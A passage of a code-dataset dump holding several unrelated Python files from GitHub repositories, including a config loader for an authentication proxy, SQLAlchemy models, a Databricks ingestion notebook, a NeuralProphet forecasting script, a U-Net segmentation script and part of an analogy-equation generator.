range(len(lst)):\r\n\tlst[i] = lst[i].split()\r\n\tfor j in range(len(lst[i])):\r\n\t\tlst[i][j] = int(lst[i][j])\r\n\r\nmyDict = {}\r\n\r\nfor i in range(len(lst)):\r\n\tmyDict[i + 1] = lst[i]\r\n\r\ndict1 = myDict.copy()\r\ndict1 = min_cut(dict1)\r\nlength = len(dict1[list(dict1.keys())[1]])\r\nprint(length)\r\n\r\nf.close()\t","repo_name":"Quoly/Algorithms_from_Coursera","sub_path":"Week 3/minimum_cut.py","file_name":"minimum_cut.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22225168242","text":"#\n# Handle ini file configuration\n#\nfrom const import *\nimport os.path\nimport srvio\nimport configparser\nimport sys\nimport login_form\nimport ticket, ipsess\nimport tlrealms, flatfiles\nimport ipacl\n\ncfg = {\n    CF_LISTEN: '0.0.0.0',\n    CF_PORT: 8080,\n    CF_LOG: LOG_SYSLOG,\n    CF_LOG_EX: APP_NAME,\n    CF_PROVIDERS: {},\n    CF_COOKIE_NAME: 'autonom_goo6Chah',\n    CF_SESSION_SIG: 'uuChah2eigahthai5OeGhuz3Cieshahc',\n    CF_TICKET_MAXAGE: 86400 * 365,\n    CF_COOKIE_MAXAGE: 86400 * 10,\n    CF_COOKIE_RENEW: 86400 * 7,\n    CF_ATIME_MIN: 3600*4,\n    
CF_IPLOGIN_MAXAGE: 3600,\n    CF_TEMPLATE_PATH: os.path.dirname(__file__) + '/views',\n    CF_DOCROOT: os.path.dirname(__file__) + '/static',\n    CF_TICKET_DB: 'autonom-tix.db',\n    CF_FIXED_IP_LIST: None,\n    CF_PROXY_LIST: None,\n    CF_PROXY_PSK: None,\n    CF_AUTH_REALM: None,\n    CF_PWCK: None,\n    RT_SESSION_MGR: {},\n    CF_BACKENDS: {},\n}\n\ndef return_false(c,k,v):\n    return False\n\n\ndef copy_settings(src,dst,cfgparse=return_false,srcdesc='config section'):\n    for key in src:\n        if key in dst:\n            if cfgparse(dst,key,src):\n                continue\n            elif isinstance(dst[key],int):\n                dst[key] = src.getint(key)\n            elif isinstance(dst[key],float):\n                dst[key] = src.getfloat(key)\n            elif isinstance(dst[key],bool):\n                dst[key] = src.getboolean(key)\n            elif isinstance(dst[key],str) or dst[key] is None:\n                dst[key] = src[key]\n            else:\n                sys.stderr.write('Unconfigurable key {key} in {srcdesc}\\n'.format(\n                    key=key, srcdesc=srcdesc))\n        else:\n            sys.stderr.write('key {key} does not exist in {srcdesc}\\n'.format(\n                key=key, srcdesc=srcdesc))\n\ndef cfg_main_parser(dst,key,src):\n    if key == CF_LOG:\n        # Handle log specification specially\n        if src[key] is None:\n            dst[CF_LOG] = LOG_STDIO\n            dst[CF_LOG_EX] = None\n        elif src[key].lower().startswith('file:'):\n            dst[CF_LOG] = LOG_FILE\n            dst[CF_LOG_EX] = src[key][5:]\n        elif src[key].lower().startswith('syslog:'):\n            dst[CF_LOG] = LOG_SYSLOG\n            dst[CF_LOG_EX] = src[key][7:]\n        elif src[key].lower() == 'syslog':\n            dst[CF_LOG] = LOG_SYSLOG\n            dst[CF_LOG_EX] = APP_NAME\n        elif src[key].lower() == 'stdio':\n            dst[CF_LOG] = LOG_STDIO\n        elif src[key] != '':\n            dst[CF_LOG] = LOG_FILE\n            dst[CF_LOG_EX] = src[key]\n        else:\n            dst[CF_LOG] = LOG_STDIO\n            dst[CF_LOG_EX] = None\n        return True\n    return False\n\n\ndef cfg_init(args):\n    if os.path.isfile(args.config):\n        # If not daemon, switch default logging to stdio\n        if not args.daemonize: cfg[CF_LOG] = LOG_STDIO\n\n        #\n        # Configure from file\n        #\n        ini = configparser.ConfigParser(allow_no_value=True)\n        ini.read(args.config)\n        copy_settings(ini[APP_NAME], cfg, cfg_main_parser, 'configuration file main section')\n\n        for ss in ini:\n            if ss == APP_NAME or ss == CF_DEFAULT: continue\n\n            if CF_PROVIDER in ini[ss]:\n                #\n                # Configure a login provider\n                #\n                if ini[ss][CF_PROVIDER] == login_form.NAME:\n                    provider = login_form\n                else:\n                    sys.stderr.write('Unknown provider {prov} in {sect}\\n'.format(\n                        prov=ini[ss][CF_PROVIDER], sect=ss))\n                    continue\n\n                cfg[CF_PROVIDERS][ss] = provider.DEFAULTS\n\n                cfg[CF_PROVIDERS][ss][CF_PROVIDER] = ini[ss][CF_PROVIDER]\n                cfg[CF_PROVIDERS][ss][CF_ID] = ss\n                cfg[CF_PROVIDERS][ss][CF_MODULE] = provider\n\n                if hasattr(provider, 'cfgparse'):\n                    cfgparse = provider.cfgparse\n                else:\n                    cfgparse = return_false\n\n                copy_settings(ini[ss],cfg[CF_PROVIDERS][ss],cfgparse,'provider {sect}'.format(sect=ss))\n\n                continue\n\n            if CF_BACKEND in ini[ss]:\n                #\n                # Configure a password backend\n                #\n                if ini[ss][CF_BACKEND] == tlrealms.NAME:\n                    backend = tlrealms\n                elif ini[ss][CF_BACKEND] == flatfiles.NAME:\n                    backend = flatfiles\n                else:\n                    sys.stderr.write('Unknown backend {backend} in {sect}\\n'.format(\n                        backend=ini[ss][CF_BACKEND], sect=ss))\n                    continue\n\n                cfg[CF_BACKENDS][ss] = backend.DEFAULTS\n\n                cfg[CF_BACKENDS][ss][CF_BACKEND] = ini[ss][CF_BACKEND]\n                cfg[CF_BACKENDS][ss][CF_ID] = ss\n                cfg[CF_BACKENDS][ss][CF_MODULE] = backend\n\n                if hasattr(backend, 'cfgparse'):\n                    cfgparse = backend.cfgparse\n                else:\n                    cfgparse = return_false\n\n                copy_settings(ini[ss],cfg[CF_BACKENDS][ss],cfgparse,'backend {sect}'.format(sect=ss))\n                continue\n\n            
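# Any other ini section is kept as a plain dict so other modules can read\n            # it, unless its name collides with a built-in configuration key.\n            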
if ss in cfg:\n                sys.stderr.write('Conflicting section name {sect} in {filename}\\n'.format(\n                    sect = ss,\n                    filename = args.config))\n                continue\n\n            cfg[ss] = dict(ini[ss])\n\n    if not args.cfv is None:\n        #\n        # Command line configuration\n        #\n        for cfv in args.cfv:\n            if '=' in cfv:\n                key, val = cfv.split('=',1)\n            else:\n                key = cfv\n                val = None\n            if '.' in key:\n                sect_name, key = key.split('.',1)\n                if sect_name in cfg[CF_PROVIDERS]:\n                    sect = cfg[CF_PROVIDERS][sect_name]\n                elif sect_name in cfg[CF_BACKENDS]:\n                    sect = cfg[CF_BACKENDS][sect_name]\n                elif sect_name in cfg:\n                    if isinstance(cfg[sect_name],dict):\n                        sect = cfg[sect_name]\n                    else:\n                        sys.stderr.write('section {sect} in {cfv} is not allowed\\n'.format(\n                            sect=sect_name, cfv=cfv))\n                        continue\n                else:\n                    sys.stderr.write('section {sect} in {cfv} does not exist\\n'.format(\n                        sect=sect_name, cfv=cfv))\n                    continue\n            else:\n                sect = cfg\n            if not key in sect:\n                sys.stderr.write('key {key} in {cfv} does not exist\\n'.format(\n                    key=key, cfv=cfv))\n                continue\n\n            if isinstance(sect[key],int):\n                sect[key] = int(val)\n            elif isinstance(sect[key],float):\n                sect[key] = float(val)\n            elif isinstance(sect[key],bool):\n                # We do this to keep things consistent...\n                tmp = configparser.ConfigParser()\n                tmp[key] = { key: val }\n                sect[key] = tmp[key].getboolean(key)\n            elif isinstance(sect[key],str) or sect[key] is None:\n                sect[key] = val\n            else:\n                sys.stderr.write('Unconfigurable key {key} in {cfv}\\n'.format(\n                    key=key, cfv=cfv))\n\n    #\n    # Initialize providers...\n    #\n    if len(cfg[CF_PROVIDERS]) == 0:\n        sys.stderr.write('No login providers configured\\n')\n        sys.exit(1)\n    for prid in cfg[CF_PROVIDERS]:\n        module = cfg[CF_PROVIDERS][prid][CF_MODULE]\n        module.cfg = cfg\n        if hasattr(module,'init'): module.init(cfg[CF_PROVIDERS][prid])\n\n    #\n    # Initialize backends...\n    #\n    fails = []\n    for beid in cfg[CF_BACKENDS]:\n        module = cfg[CF_BACKENDS][beid][CF_MODULE]\n        if not hasattr(module,'init'): continue\n        if module.init(beid,cfg[CF_BACKENDS][beid],cfg): continue\n        fails.append(beid)\n\n    for beid in fails: del cfg[CF_BACKENDS][beid]\n\n    if len(cfg[CF_BACKENDS]) == 0:\n        sys.stderr.write('No backends configured\\n')\n        sys.exit(1)\n\n    #\n    # Command line arguments\n    #\n    if not args.listen is None: cfg[CF_LISTEN] = args.listen\n    if not args.port is None: cfg[CF_PORT] = int(args.port)\n    if not args.logger is None:\n        cfg[CF_LOG] = args.logger\n        if args.logger != LOG_STDIO: cfg[CF_LOG_EX] = args.logger_data\n\n    #\n    # Read the fixed-ip list\n    #\n    if not cfg[CF_FIXED_IP_LIST] is None:\n        fixedips = {}\n        with open(cfg[CF_FIXED_IP_LIST],'r') as fp:\n            for line in fp:\n                line = line.strip()\n                if '#' in line: line = line.split('#',1)[0]\n                line = line.split()\n                if len(line) > 1:\n                    fixedips[line[0]] = line[1:]\n        cfg[CF_FIXED_IP_LIST] = fixedips\n\n    if not cfg[CF_PROXY_LIST] is None:\n        cfg[CF_PROXY_LIST] = ipacl.parse_list(cfg[CF_PROXY_LIST])\n\n    #\n    # Load session mgrs\n    #\n    cfg[RT_SESSION_MGR]['ticket'] = ticket\n    cfg[RT_SESSION_MGR]['ipsess'] = ipsess\n\n    if args.daemonize:\n        srvio.daemonize()\n        if not args.pidfile is None:\n            srvio.pidfile(args.pidfile)\n\n    if cfg[CF_LOG] == LOG_SYSLOG:\n        srvio.syslog_io(cfg[CF_LOG_EX])\n    elif cfg[CF_LOG] == LOG_FILE:\n        srvio.filelog_io(cfg[CF_LOG_EX])\n    srvio.unbuffered_io()\n\n    cfg[CF_TEMPLATE_PATH] = cfg[CF_TEMPLATE_PATH].split(':')\n\n\n","repo_name":"TortugaLabs/autonom","sub_path":"ini.py","file_name":"ini.py","file_ext":"py","file_size_in_byte":8323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14250302878","text":"# File: MyHashCode.py\r\n\r\n# 
Since Python 3.2.3\r\n#import os\r\n#print(os.environ['PYTHONHASHSEED'])\r\n#print(os.environ)\r\n\r\n# Changes EACH RUN!\r\nprint(\"a\".__hash__())\r\nprint(hash(\"a\"))\r\n\r\n# Work Around:\r\nimport zlib\r\nzBytes = bytes(\"a\",\"utf8\") # more later!\r\nprint(\"Classic:\",\r\n      zlib.crc32(zBytes) )\r\n\r\n# Work Around:\r\nimport hashlib\r\nzBytes = bytes(\"a\",\"utf8\") # more later!\r\nprint(\"hashlib:\",\r\n      hashlib.md5(zBytes).hexdigest() )\r\n\r\n","repo_name":"soft9000/Python1000","sub_path":"Python1100/Study/MyHashCode.py","file_name":"MyHashCode.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39788266949","text":"__author__ = 'yo'\n# from flask_sqlalchemy import SQLAlchemy\n# from . import db\nfrom datetime import datetime\n# class file_art(db.Model):\nfrom sqlalchemy import Column, String, create_engine, Integer, Text, DateTime\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# from sqlalchemy.orm import sessionmaker,scoped_session\n# from sqlalchemy import create_engine\n# engine = create_engine(DATABASE_URI, convert_unicode=True, pool_size=50, pool_recycle=3600)\n# session = scoped_session(sessionmaker(autocommit=True, autoflush=False, bind=engine))\n# db.session = session()\n#\n# db = SQLAlchemy()\n\n# Base class for all mapped objects:\nBase = declarative_base()\n\nclass content_DB(Base):\n    __tablename__ = 'contentdb'\n    # Column types below are assumed; the original stub listed bare field names only.\n    id = Column(Integer, primary_key=True, autoincrement=True)\n    title = Column(String(512))\n    description = Column(Text)\n    keywords = Column(String(512))\n    author = Column(String(128))\n    content = Column(Text)\n    category = Column(String(128))\n    counter = Column(Integer)\n    date = Column(DateTime, default=datetime.now)\n    srcurl = Column(String(512))\n\nclass src_DB(Base):\n    __tablename__ = 'srcdb'\n    id = Column(Integer, primary_key=True, autoincrement=True)\n    url = Column(String(512), nullable=True, comment=\"\")\n    content = Column(Text, nullable=True, comment=\"\")\n    title = Column(String(512), nullable=True, comment=\"\")\n    uptime = Column(DateTime, index=True, default=datetime.now)\n\n    __table_args__ = {\n        \"mysql_charset\": \"utf8\"\n    }\n\n# Define the User object:\nclass User(Base):\n    # Table name:\n    __tablename__ = 'user'\n\n    # Table structure:\n    id = Column(String(20), primary_key=True)\n    name = Column(String(20))\n\n# Initialize the database connection:\nengine = create_engine('mysql+mysqlconnector://root:password@host:3306/arts')\n# Create the DBSession class:\nDBSession = sessionmaker(bind=engine)\n\n# Create a Session:\nsession = DBSession()\n# Create a Query: filter is the WHERE clause; one() returns exactly one row,\n# while all() returns every row:\n# user = session.query(User).filter(User.id=='5').one()\n# Print the type and the object's name attribute:\n# print 'type:', type(user)\n# print 'name:', user.name\n# Close the Session:\nsession.close()","repo_name":"shuo502/ipscan","sub_path":"dbmodels.py","file_name":"dbmodels.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20143094731","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC All notebooks from day 1 should run in any order once the `producer` has been started.\n# MAGIC \n# MAGIC For later notebooks, this notebook can be used to declare all tables and load all data ingested through the `AutoLoader` and `COPY INTO` lessons.\n# MAGIC \n# MAGIC To recreate all tables from a fresh start:\n# MAGIC 1. Run all in the producer notebook\n# MAGIC 1. Run all in this notebook\n# MAGIC 1. Run all in the schedule_streaming_jobs notebook (pass the value `True` to the `once` widget)\n# MAGIC 1. 
Run all in the schedule_batch_jobs notebook\n\n# COMMAND ----------\n\n# MAGIC %run ./ade-setup\n\n# COMMAND ----------\n\n# MAGIC %run ./table-declaration\n\n# COMMAND ----------\n\n# MAGIC %run ./gym-mac-log-prep\n\n# COMMAND ----------\n\n# register_users\nspark.sql(f\"\"\"\nCOPY INTO registered_users\nFROM '{URI}/user-reg'\nFILEFORMAT = JSON\n\"\"\")\n\n# COMMAND ----------\n\n# user_lookup\nsalt = \"BEANS\"\n\nspark.sql(f\"\"\"\nINSERT INTO user_lookup\nSELECT sha2(concat(user_id,\"{salt}\"), 256) AS alt_id, device_id, mac_address, user_id\nFROM registered_users\n\"\"\")\n\n# COMMAND ----------\n\n# gym_mac_logs\ndef load_gym_logs():\n (spark.readStream.format(\"cloudFiles\")\n .option(\"cloudFiles.format\", \"json\")\n .schema(\"first_timestamp DOUBLE, gym BIGINT, last_timestamp DOUBLE, mac STRING\")\n .load(gym_mac_logs)\n .writeStream\n .format(\"delta\")\n .option(\"checkpointLocation\", Paths.gymMacLogsCheckpoint)\n .trigger(once=True)\n .start(Paths.gymMacLogs)\n .awaitTermination())\n \nNewFile.arrival(continuous=True)\nload_gym_logs()\n\n","repo_name":"zubair527/advanced-data-engineering-with-databricks","sub_path":"Advanced-Data-Engineering-with-Databricks/Includes/catch-up.py","file_name":"catch-up.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"21567627269","text":"import os\nimport time\nfrom functools import partial\nfrom multiprocessing import Pool, cpu_count\n\nimport fire\nimport numpy as np\nimport pandas as pd\nfrom neuralprophet import NeuralProphet\n\nfrom src.data import get_data\n\n\ndef convert_dates(index, df, horizon, freq, seasonality, dataset, group): \n if dataset == 'M4' and group == 'Yearly':\n #yearly dataset has too long series\n #see https://eng.uber.com/m4-forecasting-competition/\n df = df.tail(60)\n df['ds'] = pd.date_range(end='2018-01-01', periods=df.shape[0], freq=freq)\n return df\n\ndef main(dataset: str = 'M3', group: str = 'Other') -> None:\n train, horizon, freq, seasonality = get_data('data/', dataset, group)\n if dataset == 'M4':\n #add date to this dataset\n partial_convert_dates = partial(convert_dates, horizon=horizon, freq=freq,\n seasonality=seasonality, \n dataset=dataset, group=group)\n with Pool(cpu_count()) as pool:\n train = pool.starmap(partial_convert_dates, train.groupby('unique_id'))\n train = pd.concat(train)\n else:\n train['ds'] = pd.to_datetime(train['ds'])\n train = train.rename(columns={'unique_id': 'ID'})\n\n start = time.time()\n if dataset == 'ERCOT':\n m = NeuralProphet(\n n_forecasts=24,\n n_lags=7*24,\n learning_rate=0.01,\n num_hidden_layers=1,\n d_hidden=16,\n\t)\n regions = list(train)[1:-2]\n m = m.add_lagged_regressor(names=regions)#, only_last_value=True)\n m = m.highlight_nth_step_ahead_of_each_forecast(24)\n else:\n m = NeuralProphet(n_lags=max(horizon, seasonality), n_forecasts=horizon)\n metrics = m.fit(train, freq=freq)\n future = m.make_future_dataframe(df=train, periods=horizon)\n forecasts = m.predict(df=future, decompose=False)\n end = time.time()\n print(end - start)\n\n forecasts = forecasts.groupby('ID').tail(horizon)\n forecasts['yhat'] = forecasts.filter(regex='yhat*').max(axis=1)\n forecasts = forecasts.filter(items=['ID', 'ds', 'yhat'])\n forecasts.columns = ['unique_id', 'ds', 'neuralprophet']\n forecasts.to_csv(f'data/neuralprophet-forecasts-{dataset}-{group}.csv', index=False)\n\n time_df = pd.DataFrame({'time': [end - start], 'model': ['neuralprophet']})\n 
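# Persist the timing beside the forecasts so different models can be compared later.\n    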
time_df.to_csv(f'data/neuralprophet-time-{dataset}-{group}.csv', index=False)\n\n\nif __name__ == '__main__':\n fire.Fire(main)\n","repo_name":"Nixtla/statsforecast","sub_path":"experiments/neuralprophet/src/neuralprophet.py","file_name":"neuralprophet.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":3199,"dataset":"github-code","pt":"37"} +{"seq_id":"29440996339","text":"import sys\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport tensorflow.keras.backend as K\n\n\nIMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS = 256, 256, 3\ncategories = [\n ( 0, 0, 0), \n (244, 35,232), \n (128, 64,128),\n ( 70, 70, 70),\n (153,153,153),\n (107,142, 35),\n ( 70,130,180),\n (220, 20, 60), \n ( 0, 0,142)\n]\nclass_weights = [\n 1.0127322460863948,\n 2.6085443999046314,\n 0.31666787465874224,\n 0.5282767855660234,\n 9.547994201504986,\n 0.7136052450682393,\n 4.016557513088011,\n 6.336719440431782,\n 1.5025437504442105\n]\n\ndef one_hot_to_colors(mask):\n new_mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype='int32')\n for i in range(IMG_HEIGHT):\n for j in range(IMG_WIDTH):\n new_mask[i, j, :] = categories[np.argmax(mask[i][j])]\n return new_mask\n\n\ndef dice_coef(y_true, y_pred, smooth=1e-7):\n y_true = tf.cast(y_true, tf.float32)\n y_pred = tf.cast(y_pred, tf.float32)\n\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n dice = (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n return dice\n\nclass DiceCoefLoss(tf.keras.losses.Loss):\n def __init__(self, class_weights=[]):\n super(DiceCoefLoss, self).__init__()\n self.class_weights = class_weights\n\n def get_weight_multiplier(self, y_true):\n axis = -1\n classSelectors = K.argmax(y_true, axis=axis)\n classSelectors = tf.cast(classSelectors, 'int32')\n classSelectors = [K.equal(i, classSelectors) for i in range(len(self.class_weights))]\n classSelectors = [tf.cast(x, 'float32') for x in classSelectors]\n\n weights = [sel * w for sel,w in zip(classSelectors, self.class_weights)]\n weightMultiplier = weights[0]\n\n for i in range(1, len(weights)):\n weightMultiplier = weightMultiplier + weights[i]\n\n return weightMultiplier\n \n def loss(self, y_true, y_pred, smooth=1e-7):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n\n intersection = K.sum(y_true_f * y_pred_f)\n dice = (2. 
* intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n        return 1 - dice\n\n    def call(self, y_true, y_pred):\n        y_true = tf.cast(y_true, tf.float32)\n        y_pred = tf.cast(y_pred, tf.float32)\n        loss = self.loss(y_true, y_pred)\n        if self.class_weights:\n            weightMultiplier = self.get_weight_multiplier(y_true)\n\n            loss = tf.math.reduce_sum(loss * weightMultiplier)\n            return loss\n        return loss\n\n\n\nif __name__ == '__main__':\n    try:\n        img_path = sys.argv[1]\n    except IndexError:\n        print(\"You have to pass a file path\")\n        sys.exit(1)\n\n    model = tf.keras.models.load_model('unet_vgg19_backbone_30_epochs.h5', compile=False)\n    model.compile(optimizer=tf.keras.optimizers.Adam(),\n                  loss=DiceCoefLoss(class_weights),\n                  metrics=[dice_coef, tf.keras.metrics.CategoricalAccuracy()])\n\n    image = cv2.imread(img_path)\n    cv2.imshow(\"Original image\", image)\n\n    original_size = image.shape[:2][::-1]\n    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n    image = cv2.resize(image, (256, 256))\n    image = np.array(image).astype('float32')\n    image /= 255.\n\n    predicted_mask = model.predict(np.expand_dims(image, axis=0))[0]\n    predicted_mask = one_hot_to_colors(predicted_mask)\n    predicted_mask = predicted_mask.astype(np.uint8)\n    predicted_mask = cv2.cvtColor(predicted_mask, cv2.COLOR_RGB2BGR)\n    predicted_mask = cv2.resize(predicted_mask, original_size)\n\n\n    cv2.imshow(\"Predicted mask\", predicted_mask)\n\n    cv2.waitKey()\n    ","repo_name":"jakubdulas/cityscape-segmentation-for-self-driving-cars","sub_path":"segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22895951955","text":"# height and weight are available as regular lists\nheight = [43, 53, 65, 54, 62, 99]\nweight = [145, 160, 180, 170, 175, 220]  # assumed example values; the original snippet omitted this list\n\n# Import numpy\nimport numpy as np\n\n# Calculate the BMI: bmi\nnp_height_m = np.array(height) * 0.0254\nnp_weight_kg = np.array(weight) * 0.453592\nbmi = np_weight_kg / np_height_m ** 2\n\n# Create the light array\nlight = bmi < 21\n\n# Print out light\nprint(light)\n\n# Print out BMIs of all baseball players whose BMI is below 21 | Subsetting\nprint(bmi[light])\n","repo_name":"eightynine89/machine-learning-research","sub_path":"introduction/numpy/python/4.boolean_array.py","file_name":"4.boolean_array.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"10956311797","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nimport argparse\nimport gzip\nimport math\nimport multiprocessing\nimport sys\nimport time\nfrom collections import defaultdict\nfrom itertools import product, repeat\n\nimport matplotlib.pyplot as plt\n\nfrom neural_nlg_solver import AnalogyAlignment\nfrom neural_nlg_solver.AnalogyEquation import AnalogyEquation\n\nplt.style.use('ggplot')\n\n###############################################################################\n\n__author__ = 'KAVEETA Vivatchai '\n\n# __date__, __version__ = '10/01/2017', '0.1' # First version\n# __date__, __version__ = '11/01/2017', '0.2' # Fix progressbar\n# __date__, __version__ = '12/01/2017', '0.3' # Multiprocessing\n# __date__, __version__ = '13/01/2017', '0.4' # Fix combination algorithm, Doctest\n# __date__, __version__ = '14/01/2017', '0.5' # File writer thread, filtering\n# __date__, __version__ = '15/01/2017', '0.6' # Cluster limit\n# __date__, __version__ = '16/01/2017', '0.7' # 
Fix leaky thread bug,\n# # Option to read clusters file\n# # New doctests\n# __date__, __version__ = '17/01/2017', '0.8' # Fix doctest\n# __date__, __version__ = '19/01/2017', '0.9' # AnalogyRatio and AnalogyCluster classes\n# __date__, __version__ = '27/01/2017', '1.0' # Fix generation bugs\n# __date__, __version__ = '10/02/2017', '1.1' # On the fly gzipping, fix doctests\n# __date__, __version__ = '11/02/2017', '2.0' # Version 2: major overhaul.\n# # Formalize and separate generation functions\n# # Remove clustering. Add inserting\n# __date__, __version__ = '15/02/2017', '2.1' # Proper inserting and casting functions\n# # Seperate base analogy loops to reduce memory usage\n# __date__, __version__ = '17/02/2017', '2.2' # Memory optimization for fix_len arguments\n# __date__, __version__ = '18/02/2017', '2.3' # Implement new multi-processing\n# __date__, __version__ = '10/03/2017', '2.4' # Non-uniform fixed length and variable length\n# __date__, __version__ = '28/03/2017', '2.5' # Fix inserting bug\n# __date__, __version__ = '05/04/2017', '2.6' # Single thread fallback. Temporary use single thread as default\n# __date__, __version__ = '06/04/2017', '2.7' # Filter only unique analogies\n# __date__, __version__ = '16/04/2017', '2.8' # Fix memory for multi-thread mode, finally\n# # Default to multi thread mode\n__date__, __version__ = '05/05/2017', '2.9' # Fix severe bug in casting (suffix in C). Redo all experiments ;o;\n\n__description__ = 'Generate analogy equations from list of base analogies'\n\n\n# IDEA: Hashing filter?\n\n# IDEA: Each loop generate by every methods\n# : Save the analogy which have the target length to output list\n# : Other compare to before list remove any duplication (after set - before set)\n# : Do until all the list is empty\n\n###############################################################################\n\ndef read_argv():\n program = 'v%s (c) %s %s' % (__version__, __date__.split('/')[2], __author__)\n description = __description__\n\n parser = argparse.ArgumentParser(prog=program, description=description)\n\n # Required arguments\n parser.add_argument('file', action='store', help='an input file contains list of analogies')\n parser.add_argument('length', action='store', type=int, default=[8], help='string lengths (1 or 4 items)',\n nargs='*')\n\n # Generating arguments\n parser.add_argument('-vl', '--var-length', action='store_true', dest='var_length', default=False,\n help='give all variable length analogies as results')\n parser.add_argument('-m', '--methods', action='store', dest='methods', default='pmric',\n help='methods to run (default: pmric), r = reduplicating, p = permuting, m = mirroring, '\n 'i = inserting, c = casting')\n\n # Output arguments\n parser.add_argument('-o', '--out', action='store', dest='output', default='sys.stdout', help='output path')\n\n # Miscellaneous arguments\n parser.add_argument('-j', '--threads', action='store', type=int, dest='threads',\n default=multiprocessing.cpu_count(), help='number of processing threads')\n parser.add_argument('-g', '--graph', action='store_true', dest='graph', default=False,\n help='display statistical chart after generation')\n parser.add_argument('-v', '--verbose', action='store_true', dest='verbose', default=False, help='verbose mode')\n\n tmp_args = parser.parse_args()\n\n if len(tmp_args.length) != 1 and len(tmp_args.length) != 4:\n print('Error: length must be either 1 or 4 items(s)', file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n return 
tmp_args\n\n\n###############################################################################\n\ndef read_nlg_file(in_path):\n \"\"\"\n Read in analogies from input file.\n Assuming standard format as each line contains one analogical equation separated by ' : ' and ' :: '\n ex.- a : b :: c : d\n :param in_path: input file path contains list of analogical equations, one per each line\n \"\"\"\n\n nlgs = []\n\n # Start timer\n start_time = time.time()\n\n if args.verbose:\n print('\\nRead analogies from: {}'.format(in_path), file=sys.stderr)\n\n # Open file to read\n if '.gz' in in_path:\n in_file = gzip.open(in_path, 'rt', encoding='utf8')\n else:\n in_file = open(in_path, 'r', encoding='utf8')\n\n # with open(in_path) as in_file:\n for line in in_file.readlines():\n\n # Create new analogy object\n new_eq = AnalogyEquation(line.rstrip())\n\n # Pre-filter input equations. Ignore invalid equation\n if new_eq:\n nlgs.append(new_eq)\n\n # Close file\n in_file.close()\n\n if args.verbose:\n exec_time = time.time() - start_time\n print(' - Finished in: {0:.2f} sec'.format(exec_time), file=sys.stderr)\n print(' - Number of analogies: {}'.format(len(nlgs)), file=sys.stderr)\n\n # Display string length chart\n if args.graph:\n\n # Loop all analogy\n str_len_count = defaultdict(int)\n for nlg in nlgs:\n # Average length of string in the equation\n avg_len = math.floor(sum(len(string) for ratios in nlg for string in ratios) / 4)\n str_len_count[avg_len] += 1\n\n x_data = list(str_len_count.keys())\n y_data = list(str_len_count.values())\n\n plt.title('Number of equations by average string length')\n plt.xlabel('Average length of string')\n plt.ylabel('Number of analogical equations')\n\n plt.bar(x_data, y_data)\n plt.show()\n\n return nlgs\n\n\n###############################################################################\n\ndef is_fix_len(nlg, str_len):\n \"\"\"\n Check if AnalogicalEquation is fix_len\n :param nlg: AnalogicalEquation object\n :param str_len: String lengths\n \"\"\"\n\n return len(nlg[0][0]) == str_len[0] and len(nlg[0][1]) == str_len[1] and \\\n len(nlg[1][0]) == str_len[2] and len(nlg[1][1]) == str_len[3]\n\n\ndef is_within_len(nlg, str_len):\n \"\"\"\n Check if strings in AnalogicalEquation are shorter or equal to str_len\n :param nlg: AnalogicalEquation object\n :param str_len: String lengths\n \"\"\"\n\n return len(nlg[0][0]) <= str_len[0] and len(nlg[0][1]) <= str_len[1] and \\\n len(nlg[1][0]) <= str_len[2] and len(nlg[1][1]) <= str_len[3]\n\n\n###############################################################################\n\n\ndef gen_permute(nlg, str_len, fix_len=False):\n \"\"\"\n Generate all permuted forms of the list of input equations\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n \"\"\"\n\n # All equivalent combinations (8)\n eq_forms = [[0, 1, 2, 3], [0, 2, 1, 3], [1, 0, 3, 2], [1, 3, 0, 2],\n [2, 0, 3, 1], [2, 3, 0, 1], [3, 1, 2, 0], [3, 2, 1, 0]]\n\n # List of generated equations\n gen_nlgs = []\n\n # Generate all form\n for form in eq_forms:\n\n eq_nlg = AnalogyEquation(*[nlg[int(math.floor(idx / 2))][idx % 2] for idx in form])\n\n # Add to generated list\n if is_within_len(eq_nlg, str_len) and (not fix_len or is_fix_len(eq_nlg, str_len)):\n gen_nlgs.append(eq_nlg)\n\n return gen_nlgs\n\n\ndef gen_mirror(nlg, str_len, fix_len=False):\n \"\"\"\n Mirror analogy equation\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in 
